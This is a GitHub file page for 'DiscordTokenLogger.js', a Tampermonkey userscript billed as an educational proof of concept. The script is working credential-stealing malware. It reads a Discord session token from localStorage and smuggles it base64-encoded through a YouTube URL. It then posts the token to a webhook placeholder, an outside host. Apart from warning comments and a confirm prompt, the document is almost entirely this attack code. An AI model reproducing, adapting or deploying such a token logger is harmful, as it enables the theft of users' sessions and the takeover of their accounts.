This repository was archived by the owner on Jan 20, 2025. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathDiscordTokenLogger.js
44 lines (41 loc) · 1.69 KB
/
DiscordTokenLogger.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
// WARNING: This script is for educational purposes only. DO NOT RUN IT unless you understand the consequences.
// Executing this script without permission may violate laws and terms of service.
// ==UserScript==
// @name Discord Token Logger
// @namespace https://github.com/Lyzev/DiscordTokenLogger
// @version 1.2
// @description A simple tokenlogger for Tampermonkey. (Proof of Concept)
// @author Lyzev
// @run-at document-start
// @include http://*
// @include https://*
// @grant none
// ==/UserScript==
(function () {
alert('WARNING: Running this script may have legal consequences. Proceed with caution.');
if (!confirm('Are you sure you want to run this script?')) {
return;
}
const webhook = "WEBHOOK-URL";
if (window.location.href.startsWith("https://www.youtube.com/")) {
const url = new URL(window.location.href);
const param = atob(url.searchParams.get("v"));
if (param != null) {
const request = new XMLHttpRequest();
request.open("POST", webhook);
request.setRequestHeader("Content-type", "application/json");
const params = {
username: "Tokenlogger",
content: "Date: `" + new Date() + "`\nToken: `" + param + "`"
};
request.send(JSON.stringify(params));
}
} else if (window.location.href === "https://discord.com/channels/@me") {
const token = localStorage.token;
if (token != null) {
window.location.href = "https://www.youtube.com/watch?v=" + btoa(JSON.stringify(token));
}
} else {
window.location.href = "https://discord.com/channels/@me";
}
})();